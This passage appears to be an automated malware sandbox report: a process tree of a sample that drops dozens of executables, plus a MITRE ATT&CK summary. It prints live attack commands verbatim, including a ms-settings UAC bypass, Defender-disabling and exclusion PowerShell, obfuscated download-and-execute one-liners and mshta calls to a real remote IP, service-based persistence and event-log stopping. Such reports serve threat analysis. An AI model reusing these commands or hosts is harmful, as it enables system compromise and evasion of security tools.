      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:1872
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:5056
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:3140
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        
        PID:4084
  - - C:\Windows\system32\cmd.exe
      /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4911.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:2256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4911.vbs" /f
        5⤵
        Modifies registry class
        
        PID:2996
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:4816
  - - C:\Windows\system32\cmd.exe
      /c start /B ComputerDefaults.exe
      4⤵
      PID:3744
    - - C:\Windows\system32\ComputerDefaults.exe
        
        ComputerDefaults.exe
        5⤵
        
        PID:4624
      - C:\Windows\system32\wscript.exe
        
        "wscript.exe" C:\Users\Admin\AppData\Local\Temp\4911.vbs
        6⤵
        
        PID:400
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1572
  - - C:\Windows\system32\cmd.exe
      /c del /f C:\Users\Admin\AppData\Local\Temp\4911.vbs
      4⤵
      PID:4968
  - - C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:4416
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        5⤵
        Modifies registry class
        
        PID:480
- - C:\Users\Admin\AppData\Local\Temp\a\filer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:3840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4368
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      PID:4132
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      4⤵
      PID:2584
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4844
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:900
- - C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1232
- - C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
    3⤵
    - Executes dropped EXE
    PID:2088
- - C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
    3⤵
    - Executes dropped EXE
    PID:4000
- - C:\Users\Admin\AppData\Local\Temp\a\333.exe
    "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2152
- - C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
    "C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:480
- - C:\Users\Admin\AppData\Local\Temp\a\test12.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
    3⤵
    - Executes dropped EXE
    PID:1088
- - C:\Users\Admin\AppData\Local\Temp\a\test6.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
    3⤵
    - Executes dropped EXE
    PID:2680
- - C:\Users\Admin\AppData\Local\Temp\a\test14.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
    3⤵
    - Executes dropped EXE
    PID:2344
- - C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
    3⤵
    - Executes dropped EXE
    PID:2976
- - C:\Users\Admin\AppData\Local\Temp\a\test9.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
    3⤵
    - Executes dropped EXE
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
    3⤵
    - Executes dropped EXE
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\a\test19.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
    3⤵
    - Executes dropped EXE
    PID:2708
- - C:\Users\Admin\AppData\Local\Temp\a\test10.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
    3⤵
    - Executes dropped EXE
    PID:4396
- - C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
    3⤵
    - Executes dropped EXE
    PID:3868
- - C:\Users\Admin\AppData\Local\Temp\a\test23.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
    3⤵
    - Executes dropped EXE
    PID:4208
- - C:\Users\Admin\AppData\Local\Temp\a\test5.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
    3⤵
    - Executes dropped EXE
    PID:4060
- - C:\Users\Admin\AppData\Local\Temp\a\test11.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
    3⤵
    - Executes dropped EXE
    PID:1844
- - C:\Users\Admin\AppData\Local\Temp\a\test20.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
    3⤵
    - Executes dropped EXE
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
    3⤵
    - Executes dropped EXE
    PID:3248
- - C:\Users\Admin\AppData\Local\Temp\a\test16.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
    3⤵
    - Executes dropped EXE
    PID:5060
- - C:\Users\Admin\AppData\Local\Temp\a\test13.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
    3⤵
    - Executes dropped EXE
    PID:1812
- - C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
    3⤵
    - Executes dropped EXE
    PID:4352
- - C:\Users\Admin\AppData\Local\Temp\a\test15.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
    3⤵
    - Executes dropped EXE
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\a\test18.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
    3⤵
    - Executes dropped EXE
    PID:452
- - C:\Users\Admin\AppData\Local\Temp\a\test21.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
    3⤵
    - Executes dropped EXE
    PID:2912
- - C:\Users\Admin\AppData\Local\Temp\a\test22.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
    3⤵
    - Executes dropped EXE
    PID:896
- - C:\Users\Admin\AppData\Local\Temp\a\test8.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
    3⤵
    - Executes dropped EXE
    PID:3260
- - C:\Users\Admin\AppData\Local\Temp\a\test7.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
    3⤵
    - Executes dropped EXE
    PID:2836
- - C:\Users\Admin\AppData\Local\Temp\a\test-again.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test-again.exe"
    3⤵
    - Executes dropped EXE
    PID:3360
- - C:\Users\Admin\AppData\Local\Temp\a\test17.exe
    "C:\Users\Admin\AppData\Local\Temp\a\test17.exe"
    3⤵
    - Executes dropped EXE
    PID:4392
- - C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
      "C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3764
- - C:\Users\Admin\AppData\Local\Temp\a\win.exe
    "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:4768
  - - C:\Windows\SysWOW64\route.exe
      route print
      4⤵
      System Location Discovery: System Language Discovery
      PID:3400
  - - C:\Windows\SysWOW64\arp.exe
      arp -a 10.127.0.1
      4⤵
      Network Service Discovery
      System Location Discovery: System Language Discovery
      PID:2780
- - C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\x4lburt.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2276
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\computerlead.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1828
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        
        PID:4192
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 336
        6⤵
        Program crash
        
        PID:8
- - C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe
    "C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3764
- - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
    "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1840
  - - C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe
      "C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2264
- - C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe
    "C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2636
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd
      4⤵
      System Location Discovery: System Language Discovery
      PID:3560
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1388
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1356
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:3116
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2404
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 29442
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1760
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3140
    - - C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
        
        Reynolds.com l
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1560
      - C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
        
        C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2012
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        Suspicious use of FindShellTrayWindow
        
        PID:1464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5052
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4320
- - C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe
    "C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2652
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:1472
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2408
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4012
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3468
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:2732
- - C:\Users\Admin\AppData\Local\Temp\a\rh.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rh.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2656
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 612
      4⤵
      Program crash
      PID:2400
- - C:\Users\Admin\AppData\Local\Temp\a\file.exe
    "C:\Users\Admin\AppData\Local\Temp\a\file.exe"
    3⤵
    - Executes dropped EXE
    PID:4912
  - - C:\Windows\SYSTEM32\wscript.exe
      "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
      4⤵
      PID:3492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        
        PID:3468
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
        6⤵
        
        PID:1404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
        7⤵
        
        PID:4448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3836
        
        C:\Windows\system32\mshta.exe
        
        mshta http://176.113.115.178/Windows-Update
        8⤵
        Blocklisted process makes network request
        
        PID:1696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        9⤵
        UAC bypass
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3144
        
        C:\Users\Admin\AppData\Roaming\LB31.exe
        
        "C:\Users\Admin\AppData\Roaming\LB31.exe"
        10⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        
        PID:2956
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        11⤵
        
        PID:4424
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        12⤵
        
        PID:1676
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        11⤵
        Launches sc.exe
        
        PID:3948
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        11⤵
        Launches sc.exe
        
        PID:4988
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        11⤵
        Launches sc.exe
        
        PID:5096
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        11⤵
        Launches sc.exe
        
        PID:3584
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        11⤵
        Launches sc.exe
        
        PID:4540
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        11⤵
        Power Settings
        
        PID:4376
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        11⤵
        Power Settings
        
        PID:2624
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        11⤵
        Power Settings
        
        PID:2580
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        11⤵
        Power Settings
        
        PID:2172
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        11⤵
        
        PID:4756
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "LIB"
        11⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
        11⤵
        Launches sc.exe
        
        PID:3256
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        11⤵
        Launches sc.exe
        
        PID:4888
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "LIB"
        11⤵
        Launches sc.exe
        
        PID:1384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:5044
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
  2⤵
  - Drops startup file
  PID:868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3452

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3812

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3880

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4884

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1956

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4524

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1912

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3336 -ip 3336
1⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4352 -ip 4352
1⤵
PID:5076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:2984
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4192 -ip 4192
  2⤵
  PID:3464
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2656 -ip 2656
  2⤵
  PID:1828

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1152

C:\ProgramData\Mig\Mig.exe
C:\ProgramData\Mig\Mig.exe
1⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:2916
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  PID:404
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion